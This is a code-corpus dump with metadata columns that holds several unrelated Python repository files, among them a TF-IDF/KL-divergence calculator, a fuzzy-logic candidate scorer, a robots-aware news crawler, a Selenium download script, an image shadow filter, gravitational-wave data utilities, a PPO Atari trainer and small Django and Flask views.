seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
5420361638 | import pandas as pd
from math import log
from init_var import *
#-----------------------------------------------------------------------------#
all_term = []
with open('all_term.txt', 'r') as all_term_file:
for line in all_term_file:
term = line.split()[0]
all_term.append(term)
tf_matrix = [[0] * len(all_term) for _ in range(docnum)]
with open('tf_matrix.txt', 'r') as tf_matrix_file:
i = -1
for row in tf_matrix_file:
i += 1
row = row.split()
for j in range(len(row)):
ele = row[j]
tf_matrix[i][j] = int(ele)
df_matrix = [0] * len(all_term)
def calcDF():
# df: num of docs containing the term 't'
# return a 1d array
for col in range(len(tf_matrix[0])):
for row in range(len(tf_matrix)):
if tf_matrix[row][col] == 0:
pass
else:
df_matrix[col] += 1
print('Calculating df_matrix ...')
calcDF()
with open('df_matrix.txt', 'w') as df_matrix_file:
print(*df_matrix, sep='\n', file=df_matrix_file)
tf_idf_matrix = [[0] * len(all_term) for _ in range(docnum)]
def calcTFIDF():
# tf: term frequency - inverse document frequency
# return a 2d array
for row in range(len(tf_idf_matrix)):
for col in range(len(tf_idf_matrix[0])):
tf_idf_matrix[row][col] = round(tf_matrix[row][col] * log(docnum / df_matrix[col]), 3)
print('Calculating tfidf_matrix ...')
calcTFIDF()
with open('tf_idf_matrix.txt', 'w') as tf_idf_matrix_file:
for row in tf_idf_matrix:
print(*row, sep=' ', file=tf_idf_matrix_file)
def calcKLD(vec1, vec2):
# kld: KL divergence
kld = 0
for i in range(len(vec1)):
if vec1[i]==0 or vec2[i]==0:
pass
else:
kld += vec1[i] * log(vec1[i] / vec2[i])
return kld
kld_matrix = [[0] * docnum for _ in range(docnum)]
akld_matrix = [[0] * docnum for _ in range(docnum)]
def calcAKLD():
# akld: average KL divergence
for row in range(docnum):
for col in range(docnum):
kld_matrix[row][col] = calcKLD(tf_idf_matrix[row], tf_idf_matrix[col])
for row in range(docnum):
for col in range(docnum):
akld_matrix[row][col] = round(1/2 * (kld_matrix[row][col] + kld_matrix[col][row]), 3)
print('Calculating alkd_matrix ...')
calcAKLD()
with open('akld_matrix.txt', 'w') as alkd_matrix_file:
for row in akld_matrix:
print(*row, sep=' ', file=alkd_matrix_file)
| Hansimov/info-theory-proj | proj-1/calc_tfidf.py | calc_tfidf.py | py | 2,481 | python | en | code | 0 | github-code | 36 |
35197943498 | import sys
import IPython
import numpy as np
import pprint as pp
from IPython.display import display
import sklearn
import matplotlib.pyplot as plt
from MembershipFunc import MemberFunc
# import Membership
class FuzzyLogic(object):
"""docstring for FuzzyLogic."""
def __init__(self, data2tes):
super(FuzzyLogic, self).__init__()
self.allrule = [];
self.endResult = {};
self.MemberFunc = MemberFunc()
self.academy = data2tes[0]
self.relevancy = data2tes[1]
self.interview = data2tes[2]
self.fuzzyFucation()
def findMew(self,x,data):
res = 0;
if x <= data[0] or x >= data[3]:
res = 0
if data[0] <= x <= data[1]:
res = (x-data[0]) / (data[1]-data[0])
if data[1] <= x <= data[2]:
res = 1
if data[2] <= x <= data[3]:
res = (data[3]-x) / (data[3]-data[2])
return float("{0:.2f}".format(res))
def fuzzyFucation(self):
self.acad_data = {'high': [3.0,3.0,3.3,3.5], 'vhigh': [3.3,3.5,4.0,4.0]}
self.rele_data = {'low': [0,0,2,5], 'medium': [2,5,5,8], 'high': [5,8,10,10]}
self.inte_data = {'low': [0,0,2,5], 'medium': [2,5,5,8], 'high': [5,8,10,10]}
self.cand_data = {'least': [0,0,2,4], 'less': [2,4,4,6], 'prefer': [4,6,6,8], 'most': [6,8,10,10]}
self.acad_range = np.arange(3, 4, 0.1)
self.rele_range = np.arange(0, 11, 1)
self.inte_range = np.arange(0, 11, 1)
self.cand_range = np.arange(0, 11, 1)
self.mew_akademik = {'mhigh':self.findMew(self.academy,self.acad_data['high']),'mvhigh':self.findMew(self.academy,self.acad_data['vhigh'])}
self.mew_relevansi = {'low':self.findMew(self.relevancy,self.rele_data['low']),'medium':self.findMew(self.relevancy,self.rele_data['medium']),'high':self.findMew(self.relevancy,self.rele_data['high'])}
self.mew_interview = {'low':self.findMew(self.interview,self.inte_data['low']),'medium':self.findMew(self.interview,self.inte_data['medium']),'high':self.findMew(self.interview,self.inte_data['high'])}
def newRule(self,ismin,candidate):
tomin = min(ismin)
resbawah = []
if candidate[0] == candidate[1]:
for x in range(0,11):
resbawah.append(self.MemberFunc.leftTrapezoid(x,tomin,candidate))
if candidate[1] == candidate[2]:
for x in range(0,11):
resbawah.append(self.MemberFunc.centerTriangular(x,tomin,candidate))
if candidate[2] == candidate[3]:
for x in range(0,11):
resbawah.append(self.MemberFunc.rightTrapezoid(x,tomin,candidate))
self.allrule.append(resbawah)
def addRule(self):
rule1 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['low'],self.mew_interview['low']],self.cand_data['least'])
rule2 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['low'],self.mew_interview['medium']],self.cand_data['least'])
rule3 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['low'],self.mew_interview['high']],self.cand_data['less'])
rule4 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['medium'],self.mew_interview['low']],self.cand_data['least'])
rule5 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['medium'],self.mew_interview['medium']],self.cand_data['less'])
rule6 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['medium'],self.mew_interview['high']],self.cand_data['prefer'])
rule7 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['high'],self.mew_interview['low']],self.cand_data['less'])
rule8 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['high'],self.mew_interview['medium']],self.cand_data['prefer'])
rule9 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['high'],self.mew_interview['high']],self.cand_data['prefer'])
# pp.pprint(allrule)
rule10 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['low'],self.mew_interview['low']],self.cand_data['less'])
rule11 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['low'],self.mew_interview['low']],self.cand_data['less'])
rule12 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['low'],self.mew_interview['medium']],self.cand_data['prefer'])
rule13 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['low'],self.mew_interview['high']],self.cand_data['less'])
rule14 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['medium'],self.mew_interview['low']],self.cand_data['prefer'])
rule15 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['medium'],self.mew_interview['medium']],self.cand_data['most'])
rule16 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['medium'],self.mew_interview['high']],self.cand_data['prefer'])
rule17 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['high'],self.mew_interview['low']],self.cand_data['most'])
rule18 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['high'],self.mew_interview['medium']],self.cand_data['most'])
def doCompute(self):
bawahPerRule = np.array(self.allrule)
# pp.pprint(bawahPerRule)
agregasi = bawahPerRule.max(axis=0)
# pp.pprint(agregasi)
defuz = 0
atas = 0
for i in range (0,11):
atas = atas + (i*agregasi[i])
defuz = atas / np.sum(agregasi)
self.endResult['pembilang'] = atas
self.endResult['penyebut'] = np.sum(agregasi)
self.endResult['hasil'] = defuz
def show(self):
print()
print("=== Proses Mew Tiap Inputan ===")
print("Academi:"+str(self.academy)+" | Relevancy:"+str(self.relevancy)+" | Interview:"+str(self.interview))
print()
print("=== Proses Mew Tiap Inputan ===")
# pp.pprint(self.allrule)
pp.pprint(self.mew_akademik)
pp.pprint(self.mew_relevansi)
pp.pprint(self.mew_interview)
print()
print("=== Proses Perhitungan Rule Dan Penentuan Agregasi ===")
# pp.pprint(bawahPerRule)
# pp.pprint(agregasi)
print() #ini belum tau apa yang mau ditampilakn disini
print("=== Proses Hasil Akhir ===")
pp.pprint(self.endResult)
print()
myFuzzy = FuzzyLogic([3.1,8,9])
myFuzzy.addRule()
myFuzzy.doCompute()
myFuzzy.show()
| fianekame/ComputationalIteligence | Fuzzy/Manual/main.py | main.py | py | 6,526 | python | en | code | 0 | github-code | 36 |
32316213655 | import time
import threading
import logging
import traceback
import datetime
import os
import sys
import re
import robotparser as rp
import numpy as np
import random
import util
import decide
import queries
from conn import connect
class Crawler:
'''
Abstract class for crawling a news source.
'''
########################
# #
# Abstract functions #
# #
########################
def sleep(self):
'''
Abstract function for waiting between requests.
Can add additional functionality, such as random sleep times.
'''
return NotImplemented
def is_article(self, url):
'''
Abstract function for determining if a url is an article or not.
Returns True if the url is an article, false otherwise.
'''
return NotImplemented
def extract_date_from_url(self, url):
'''
Abstract function for parsing a date from a url.
Currently crawler only works for sources with dates in their urls.
Takes a url as a string, returns a datetime.date object.
'''
return NotImplemented
############################
# #
# Non-Abstract functions #
# #
############################
def __init__(self, base_url_string):
'''
Not abstract.
Parameters:
base_url_string, a string representing the base url for a source (eg, foxnews.com)
article_regex, a string representing a regex which only matches for articles
'''
self.base_url_string = base_url_string
self.initialize_robots()
def initialize_robots(self):
'''
Not abstract.
Initializes a robot parser for the crawler.
Use self.robot_parser.can_fetch("*", url) to decide if allowed or not.
'''
base_url_string = self.base_url_string
robot_url = util.robots_url(base_url_string)
robot_parser = rp.RobotFileParser()
robot_parser.set_url(robot_url)
robot_parser.read()
self.robot_parser = robot_parser
def decide_next_visit(self, conn, crawl_id, bad_urls):
'''
Not abstract.
Decides which url to visit next.
Returns a dictionary visit_url with two keys
visit_url['id'] - database if of the url to visit
visit_url['url'] - string representation of the url to visit
Returns None if no urls left to visit.
Strategy is to visit anything not visited this crawl, with the following priority:
1) base url
2) internal pages linked from the base url
2) articles which haven't been visited yet, sorted by date
Currently only implemented 1) and 2)
'''
base_url_string = self.base_url_string
# strategy 1 - visit base url if not visited yet (ignore previous crawls)
base_url_id = queries.insert_url(conn, base_url_string)
base_url = {'id': base_url_id, 'url': base_url_string}
visited_base = decide.visited_base_url(conn, crawl_id)
if not visited_base:
return base_url
# strategy 2 - visit any urls linked by the base url that haven't been visited yet (ignore previous crawls)
urls = decide.find_unvisited_links_from_base(conn, crawl_id, base_url_string)
urls = filter(lambda url: self.robot_parser.can_fetch("*", url['url']), urls)
urls = filter(lambda url: url['id'] not in bad_urls, urls)
if len(urls) > 0:
visit_url = random.choice(urls)
return visit_url
# strategy 3 - visit any articles not visited yet (including previous crawls), starting with the most recent
urls = decide.find_unvisited_internal_urls(conn, base_url_string)
urls = filter(lambda url: self.robot_parser.can_fetch("*", url['url']), urls)
urls = filter(lambda url: url['id'] not in bad_urls, urls)
urls = filter(lambda url: self.is_article(url['url']), urls)
if len(urls) > 0:
dates = map(lambda url: self.extract_date_from_url(url['url']), urls)
reverse_sorted_dates = np.argsort(np.array(dates))[::-1]
last_date_index = reverse_sorted_dates[0]
visit_url = urls[last_date_index]
return visit_url
return None
def crawl(self):
'''
Not abstract. Begins a crawl.
Crawls until MAX_VISITS is reached, unless:
- self.decide_next_visit(conn) returns None
- Five exceptions in a row
'''
# initialize variables
visits = 0
MAX_VISITS = 1000 # so we don't just keep crawling forever
bad_urls = set() # when a url doesn't work, add url_id to bad_urls, ignore in future
error_count = 0
base_url_string = self.base_url_string
conn = connect()
# initialize logging
initialize_logging(base_url_string)
start_time = time.time()
logging.info('STARTING CRAWL AT TIME: {0}'.format(util.time_string(start_time)))
# initlialize database for this crawl
base_url_id = queries.insert_url(conn, base_url_string)
source_id = queries.insert_source(conn, base_url_string)
crawl_id = queries.insert_crawl(conn, base_url_string)
while True:
if error_count == 5:
logging.error('Too many exceptions in a row, exiting.')
break
visit_url = self.decide_next_visit(conn, crawl_id, bad_urls)
if visit_url is None:
logging.info('Finished crawling, no more urls to visit.')
break
try:
logging.info('Visiting {}'.format(visit_url['url']))
self.visit(conn, crawl_id, source_id, visit_url)
error_count = 0
except Exception as e:
logging.error('Error when downloading {0}'.format(visit_url['url']))
logging.error(traceback.format_exc())
bad_urls.add(visit_url['id'])
error_count += 1
visits += 1
if visits == MAX_VISITS:
logging.info('Finished crawling, reached max visits of {}'.format(MAX_VISITS))
break
self.sleep()
def visit(self, conn, crawl_id, source_id, visit_url):
'''
Not abstract. Visits a url during a crawl.
Inserts all relevant information to the database for a single visit.
Inserts article information if the url matches the article regex.
'''
visit_url_id = visit_url['id']
visit_url_string = visit_url['url']
base_url_string = self.base_url_string
html = util.download_html(visit_url_string)
found_links = util.extract_links(html, base_url_string)
visit_id = queries.insert_visit(conn, crawl_id, visit_url_id)
new_url_ids = queries.insert_urls(conn, found_links)
queries.insert_links(conn, visit_id, new_url_ids)
if self.is_article(visit_url_string):
article = util.extract_article(html, visit_url_string)
article_title = article.title
article_text = article.text
article_date = self.extract_date_from_url(visit_url_string)
queries.insert_article(conn, visit_url_id, article_title, article_text, article_date, source_id)
def initialize_logging(base_url):
log_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'logs')
if not os.path.exists(log_dir):
os.makedirs(log_dir)
source_str = util.extract_source(base_url)
log_filename = 'LOG_{0}.log'.format(source_str)
log_path = os.path.join(log_dir, log_filename)
logging.basicConfig(filename=log_path, filemode='a', level=logging.INFO)
stderrLogger=logging.StreamHandler()
stderrLogger.setFormatter(logging.Formatter(logging.BASIC_FORMAT))
logging.getLogger().addHandler(stderrLogger)
sys.excepthook = log_unchecked_exception
def log_unchecked_exception(exctype, value, tb):
traceback.print_tb(tb)
log_str = '''
UNCHECKED EXCEPTION
Type: {}
Value: {}
Traceback: {}'''.format(exctype, value, traceback.print_tb(tb))
logging.error(log_str)
| bentruitt/TopicStory | topicstory/crawler/crawler.py | crawler.py | py | 8,339 | python | en | code | 0 | github-code | 36 |
71399122025 |
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
import time
driver = webdriver.Firefox()
driver.get('https://github.com/Vidoosh/Image-colorizer')
time.sleep(2)
code = driver.find_element(By.CSS_SELECTOR, '#repo-content-pjax-container > div > div > div.Layout.Layout--flowRow-until-md.Layout--sidebarPosition-end.Layout--sidebarPosition-flowRow-end > div.Layout-main > div.file-navigation.mb-3.d-flex.flex-items-start > span.d-none.d-md-flex.ml-2 > get-repo > feature-callout')
code.click()
time.sleep(1)
try:
download = driver.find_element(By.CSS_SELECTOR, '#local-panel > ul > li:nth-child(3) > a')
download.click()
print("Download initiated successfully")
except NoSuchElementException as e:
print("Download button not found")
finally:
driver.quit()
| sravanithummapudi/st | download_button.py | download_button.py | py | 901 | python | en | code | 0 | github-code | 36 |
11876743553 | # 数据预处理 阴影过滤
#yangzhen
#2020.4.13
#translate from matlab
"""get the shadow proportion from images
of remote sensing"""
import numpy as np
import cv2
import os
import json
from shutil import copyfile
import argparse
def cv_imread(file_path):
cv_img=cv2.imdecode(np.fromfile(file_path,dtype=np.uint8),1)
return cv_img
def cv_imwrite(filepath,img):
cv2.imencode(".png",img)[1].tofile(filepath)
def standard(data):
'''影像文件标准化
输入单通道影像
输出标准化后单通道影像'''
mdata = data.copy()
irow, icol = mdata.shape[0:2]
mdata = np.reshape(mdata, [irow*icol, 1])
temp1 = mdata - np.min(data)
result = temp1/(np.max(data)-np.min(data))
result = np.reshape(result, [irow, icol])
np.seterr(divide='ignore', invalid='ignore')
return result
def GetLight(img):
'''计算人眼视觉特性亮度'''
mimg = img.copy()
B = mimg[:,:,0]
G = mimg[:,:,1]
R = mimg[:,:,2]
result = 0.04*R+0.5*G+0.46*B
return result
def GetColor(img):
'''色度空间归一化'''
mimg = img.copy()
misc = mimg[:,:,0]+mimg[:,:,1]+mimg[:,:,2]
misc[misc == 0] = 0.0000001
mimg[:,:,0] = img[:,:,0]/misc
mimg[:,:,1] = img[:,:,1]/misc
result = np.abs(mimg - img)
result = (result[:,:,0]+result[:,:,1])/2
return result
def GetVege(img):
'''获取植被特征'''
mimg = img.copy()
B = mimg[:,:,0]
G = mimg[:,:,1]
R = mimg[:,:,2]
result = G-np.minimum(R, B)
result[result<0] = 0
return result
def GetLDV(idist, ilight, ivege):
'''总决策'''
idist = standard(idist)
ilight = standard(ilight)
ivege = standard(ivege)
result = idist-ilight-ivege
result[result<0]=0
return result
def FinalTrare(img):
'''结果后处理'''
mimg = img.copy()
mimg = np.uint8(standard(mimg)*255)
T, result = cv2.threshold(mimg, 0, 255, cv2.THRESH_OTSU)
result = cv2.medianBlur(result, 7)
return result
def ShadowsProportion(path:{}):
"""
阴影提取
@@path: {},
@path[0] 待检测阴影的影像
@path[1] 待检测阴影的影像
@path[2] 阴影比例阈值
ps: 当两张影像过大时会进行分块
"""
File_in = path[0]
File_out = path[1]
T = path[2]
mpath = path[3]
File_out2=path[4]
if not os.path.exists(File_out):
os.makedirs(File_out)
if not os.path.exists(File_out2):
os.makedirs(File_out2)
#开始检测
namelist=[]
for filename in os.listdir(File_in):
if not filename.find('.png') == -1:
namelist.append(filename)
n = len(namelist)
fid = open('ShadowsProportion.txt', 'w')
for i in range(n):
filenamein = os.path.join(File_in, namelist[i])
img = cv_imread(filenamein)
#获取阴影
img1 = img.astype(np.float)
img1[:,:,0] = standard(img[:,:,0])
img1[:,:,1] = standard(img[:,:,1])
img1[:,:,2] = standard(img[:,:,2])
idist = GetColor(img1)
ilight = GetLight(img1)
ivege = GetVege(img1)
final = GetLDV(idist, ilight, ivege)
shadow = FinalTrare(final)
shadow = shadow/255
#计算阴影比例并保存比例值
S = shadow.size
s = np.sum(sum(shadow))
iratio = s/S
fid.write(namelist[i] + ',' + str('%.3f' % iratio) + '\n')
#保存阴影比例小于阈值的图片
filenameout = os.path.join(File_out, namelist[i])
filenameout2 = os.path.join(File_out2, namelist[i])
mapout = mpath.replace('rawdata','noshade')
if not os.path.exists(mapout):
os.makedirs(mapout)
if iratio < T:
cv_imwrite(filenameout, img)
copyfile(os.path.join(mpath,namelist[i]),(os.path.join(mapout,namelist[i])))
else :
cv_imwrite(filenameout2, img)
fid.close()
def takejson(getjson):
json1 = json.loads(getjson)
path = {}
path[0] = json1['rpath']
path[1] = path[0].replace('rawdata','noshade')
path[2] = json1['shadowProportion']
path[3]=json1['mpath']
path[4]=path[0].replace('rawdata','withshade')
#print (path)
ShadowsProportion(path)
print ('Shadow filtering Completed')
if __name__ == "__main__":
#获取输入图片路径,阴影比例阈值,输出图片路径
# File_in = input('Please input the data file name:')
# T = float(input('Please input the threshold value:'))
# File_out = input('Please input the out-img filename:')
parser = argparse.ArgumentParser()
parser.add_argument('--input_json', type=str, help='输入json字符串')
args = parser.parse_args()
# json1={'rpath':r'F:\Chicago2\metadata\谷歌影像无标注\14\14_14aligned','mpath':r'F:\Chicago2\metadata\谷歌地图无标注\14\14_14aligned','shadowProportion':0.2}
# getjson=json.dumps(json1)
takejson(args.input_json)
| jansona/GeoScripts | shadow_filter/shadowfilter.py | shadowfilter.py | py | 4,966 | python | en | code | 0 | github-code | 36 |
2986896269 | import os
import h5py
import numpy as np
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
if 'KAGGLE_BASE_URL' in os.environ:
challenge = 'g2net-detecting-continuous-gravitational-waves'
PATH_TO_TEST_FOLDER = os.path.join('/kaggle', 'input', challenge, 'test')
PATH_TO_TRAIN_FOLDER = os.path.join('/kaggle', 'input', challenge, 'train')
PATH_TO_LABEL_FILE = os.path.join('/kaggle', 'input', challenge, 'train_labels.csv')
PATH_TO_MODEL_FOLDER = os.path.join('/kaggle', 'input', 'models')
PATH_TO_LOG_FOLDER = os.path.join('/kaggle', 'temp', 'logs')
PATH_TO_CACHE_FOLDER = os.path.join('/kaggle', 'working', 'cache')
PATH_TO_SIGNAL_FOLDER = os.path.join('/kaggle', 'working', 'signal')
PATH_TO_NOISE_FOLDER = os.path.join('/kaggle', 'working', 'noise')
PATH_TO_DYNAMIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'dynamic')
PATH_TO_STATIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'static')
PATH_TO_SOURCE_FOLDER = os.path.join('/kaggle', 'working', 'src')
else:
PATH_TO_TEST_FOLDER = os.path.join(os.getcwd(), 'test_data')
PATH_TO_TRAIN_FOLDER = os.path.join(os.getcwd(), 'train_data')
PATH_TO_MODEL_FOLDER = os.path.join(os.getcwd(), 'models_saved')
PATH_TO_LOG_FOLDER = os.path.join(os.getcwd(), 'logs')
PATH_TO_CACHE_FOLDER = os.path.join(os.getcwd(), 'cache')
PATH_TO_LABEL_FILE = os.path.join(os.getcwd(), 'train_labels.csv')
PATH_TO_SIGNAL_FOLDER = os.path.join(os.getcwd(), 'signal')
PATH_TO_NOISE_FOLDER = os.path.join(os.getcwd(), 'noise')
PATH_TO_DYNAMIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'dynamic')
PATH_TO_STATIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'static')
PATH_TO_TMP_FOLDER = os.path.join(os.getcwd(), 'tmp')
PATH_TO_SOURCE_FOLDER = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))
# setup
if not os.path.isdir(PATH_TO_TRAIN_FOLDER):
os.makedirs(PATH_TO_TRAIN_FOLDER)
if not os.path.isdir(PATH_TO_TEST_FOLDER):
os.makedirs(PATH_TO_TEST_FOLDER)
if not os.path.isdir(PATH_TO_MODEL_FOLDER):
os.makedirs(PATH_TO_MODEL_FOLDER)
if not os.path.isdir(PATH_TO_LOG_FOLDER):
os.makedirs(PATH_TO_LOG_FOLDER)
if not os.path.isdir(PATH_TO_CACHE_FOLDER):
os.makedirs(PATH_TO_CACHE_FOLDER)
if not os.path.isdir(PATH_TO_NOISE_FOLDER):
os.makedirs(PATH_TO_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_SIGNAL_FOLDER):
os.makedirs(PATH_TO_SIGNAL_FOLDER)
if not os.path.isdir(PATH_TO_DYNAMIC_NOISE_FOLDER):
os.makedirs(PATH_TO_DYNAMIC_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_STATIC_NOISE_FOLDER):
os.makedirs(PATH_TO_STATIC_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_TMP_FOLDER):
os.makedirs(PATH_TO_TMP_FOLDER)
if 'IS_CHARLIE' in os.environ:
print('We are on Charlie')
os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
#os.environ["PYTORCH_CUDA_ALLOC_CONF"] = "max_split_size_mb:2000"
def print_red(*text):
print(f'{bcolors.FAIL}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_blue(*text):
print(f'{bcolors.OKCYAN}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_green(*text):
print(f'{bcolors.OKGREEN}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_yellow(*text):
print(f'{bcolors.WARNING}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def open_hdf5_file(path_to_file):
result = {}
with h5py.File(path_to_file, 'r') as hd5_file:
base_key = list(hd5_file.keys())[0]
result['base_key'] = base_key
result['frequencies'] = np.array(hd5_file[f'{base_key}/frequency_Hz'])
result['h1'] = {}
result['l1'] = {}
result['h1']['amplitudes'] = np.array(hd5_file[f'{base_key}/H1/SFTs'])
result['l1']['amplitudes'] = np.array(hd5_file[f'{base_key}/L1/SFTs'])
result['h1']['timestamps'] = np.array(hd5_file[f'{base_key}/H1/timestamps_GPS'])
result['l1']['timestamps'] = np.array(hd5_file[f'{base_key}/L1/timestamps_GPS'])
return result
def get_df_dynamic_noise():
assert len(os.listdir(PATH_TO_DYNAMIC_NOISE_FOLDER)) != 0, 'There must be data in noise folder'
return [os.path.join(PATH_TO_DYNAMIC_NOISE_FOLDER, p) for p in os.listdir(PATH_TO_DYNAMIC_NOISE_FOLDER)]
def get_df_static_noise():
assert len(os.listdir(PATH_TO_STATIC_NOISE_FOLDER)) != 0, 'There must be data in static_noise folder'
return [os.path.join(PATH_TO_STATIC_NOISE_FOLDER, p) for p in os.listdir(PATH_TO_STATIC_NOISE_FOLDER)]
def get_df_signal():
assert len(os.listdir(PATH_TO_SIGNAL_FOLDER)) != 0, 'There must be data in signal folder'
all_files = [os.path.join(PATH_TO_SIGNAL_FOLDER, p) for p in os.listdir(PATH_TO_SIGNAL_FOLDER)]
all_files = sorted(all_files)
offset = len(all_files) // 2
return [(all_files[i], all_files[i+offset]) for i in range(offset)]
def normalize_image(img):
img += abs(np.min(img))
img /= np.max(img)
img *= 255
return img
if __name__ == '__main__':
print_red('This', 'text', 'is red', 1, 23)
print_blue('This', 'text', 'is blue', 1, 23)
print_green('This', 'text', 'is green', 1, 23)
print_yellow('This', 'text', 'is yellow', 1, 23)
| felix-20/gravitational_oceans | src/helper/utils.py | utils.py | py | 5,376 | python | en | code | 1 | github-code | 36 |
23313577208 | import argparse
import gym
import random
import tensorflow as tf
import numpy as np
from tqdm import trange
from tensorflow import keras
from network import SharedModel
from subproc_env import EnvActor, SubProcessEnv
# Some parameters taken from OpenAI
# baselines implementation, since
# they're not mentioned in the paper.
num_actors = 8
# Values taken from Atari experiments
# in original paper where relevant
gae_lambda = 0.95
gamma = 0.99
base_clip_epsilon = 0.1
max_steps = 1e6
base_learning_rate = 2.5e-4
horizon = 128
batch_size = 32
optim_epochs = 3
value_loss_coefficient = 1
entropy_loss_coefficient = .01
gradient_max = 10.0
start_t = 0
checkpoint_filename = "./ppo-model.ckpt"
log_dir = "./tb_log"
SMALL_NUM = 1e-8
def main():
env_name = "PongNoFrameskip-v4"
# NOTE: This is currently not used since we use SubProcessEnv instead;
# only used for getting shape of observation/acton space.
unused_env = gym.make(env_name)
#pobs_shape = unused_env.observation_space.shape
# Hard-coding pre-processing step shape; could read it from an example output instead?
obs_shape = (84, 84, 4)
num_actions = unused_env.action_space.n
model = SharedModel(obs_shape, num_actions)
t = start_t
last_save = 0
actors = []
for ii in range(num_actors):
actors.append(EnvActor(SubProcessEnv(env_name), model, num_actions))
while(t <= max_steps):
for ii in range(horizon):
for actor in actors:
actor.step_env(t)
t += 1
for actor in actors:
actor.calculate_horizon_advantages(t)
# Construct randomly sampled (without replacement) mini-batches.
obs_horizon = []
act_horizon = []
policy_horizon = []
adv_est_horizon = []
val_est_horizon = []
for actor in actors:
obs_a, act_a, policy_a, adv_est_a, val_est_a = actor.get_horizon(t)
obs_horizon.extend(obs_a)
act_horizon.extend(act_a)
policy_horizon.extend(policy_a)
adv_est_horizon.extend(adv_est_a)
val_est_horizon.extend(val_est_a)
# Normalizing advantage estimates.
# NOTE: Adding this significantly improved performance
# NOTE: Moved this out of each individual actor, so that advantages for the whole batch are normalized with each other.
adv_est_horizon = np.array(adv_est_horizon)
adv_est_horizon = (adv_est_horizon - np.mean(adv_est_horizon)) / (np.std(adv_est_horizon) + SMALL_NUM)
num_samples = len(obs_horizon)
indices = list(range(num_samples))
for e in range(optim_epochs):
random.shuffle(indices)
ii = 0
# TODO: Don't crash if batch_size is not a divisor of total sample count.
while ii < num_samples:
obs_batch = []
act_batch = []
policy_batch = []
adv_batch = []
value_sample_batch = []
for _ in range(batch_size):
index = indices[ii]
obs_batch.append(obs_horizon[index].__array__())
act_batch.append(act_horizon[index].__array__())
policy_batch.append(policy_horizon[index].__array__())
adv_batch.append(adv_est_horizon[index].__array__())
value_sample_batch.append(val_est_horizon[index])
ii += 1
def alpha_anneal(t):
return np.maximum(1.0 - (float(t) / float(max_steps)), 0.0)
total_loss = model.train(np.array(obs_batch),
np.array(act_batch),
np.array(policy_batch),
np.array(adv_batch),
np.array(value_sample_batch),
alpha_anneal(t))
for actor in actors:
actor.flush(t)
if t-last_save > 10000:
print("Saving network")
model.network.save(checkpoint_filename)
last_save = t
all_ep_rewards = []
for actor in actors:
all_ep_rewards.extend(actor.episode_rewards)
if len(all_ep_rewards) >= 10:
print("T: %d" % (t,))
print("\tAVG Reward: %f" % (np.mean(all_ep_rewards),))
print("\tMIN Reward: %f" % (np.amin(all_ep_rewards),))
print("\tMAX Reward: %f" % (np.amax(all_ep_rewards),))
for actor in actors:
actor.episode_rewards = []
if __name__ == '__main__':
main() | james-sorrell/reinforcement_learning | atari/ppo/main.py | main.py | py | 4,674 | python | en | code | 2 | github-code | 36 |
39209701807 | # Create your views here.
from django.shortcuts import render
from team.models import Player
from django.shortcuts import render, get_object_or_404, redirect, render_to_response
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
def home(request):
context = {'message': 'Here is a message!'}
return render(request, "team/home.html", context)
def roster(request):
player_list = Player.objects.all()
paginator = Paginator(player_list, 100)
page = request.GET.get('page')
try:
players=paginator.page(page)
except PageNotAnInteger:
players = paginator.page(1)
except EmptyPage:
players = paginator.page(1)
return render(request, "team/roster.html", {'players': players})
def player(request, pk):
player = get_object_or_404(Player, id=pk)
return render(request, "team/player.html", {'player': player})
| carolinp/Project-1 | team/views.py | views.py | py | 890 | python | en | code | 0 | github-code | 36 |
36872129562 | #! /usr/bin/python3
# -*- coding:utf-8 -*-
from flask import Flask, request, render_template, redirect
import json
import os
app = Flask(__name__)
@app.route('/')
def accueil():
if os.path.exists("db")==False:
os.mkdir("db")
return render_template('index.html')
